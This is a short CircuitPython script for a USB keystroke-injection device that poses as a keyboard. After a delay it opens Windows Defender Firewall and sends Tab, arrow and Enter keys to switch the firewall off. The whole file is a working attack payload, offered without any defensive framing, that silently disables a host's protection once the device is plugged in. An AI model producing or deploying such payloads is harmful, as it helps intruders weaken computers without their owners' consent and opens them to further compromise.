import usb_hid
import time
from adafruit_hid.keycode import Keycode
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS

kbd = Keyboard(usb_hid.devices)
layout = KeyboardLayoutUS(kbd)

time.sleep(20)
#lines 11 to 70 disable windows stock firewall
kbd.send(Keycode.GUI)
time.sleep(1)
layout.write("Windows Defender Firewall")
time.sleep(0.5)
kbd.send(Keycode.ENTER)
time.sleep(3)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(1)
kbd.send(Keycode.ENTER)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.1)
kbd.send(Keycode.DOWN_ARROW)
time.sleep(0.1)
kbd.send(Keycode.DOWN_ARROW)
time.sleep(0.5)
kbd.send(Keycode.ENTER)
time.sleep(0.1)
kbd.send(Keycode.DOWN_ARROW)
time.sleep(0.1)
kbd.send(Keycode.DOWN_ARROW)
time.sleep(0.1)
kbd.send(Keycode.DOWN_ARROW)
time.sleep(0.1)
kbd.send(Keycode.DOWN_ARROW)
time.sleep(0.5)
kbd.send(Keycode.ENTER)
time.sleep(0.1)
kbd.send(Keycode.TAB)
time.sleep(0.5)
kbd.send(Keycode.ENTER)


print("Done")
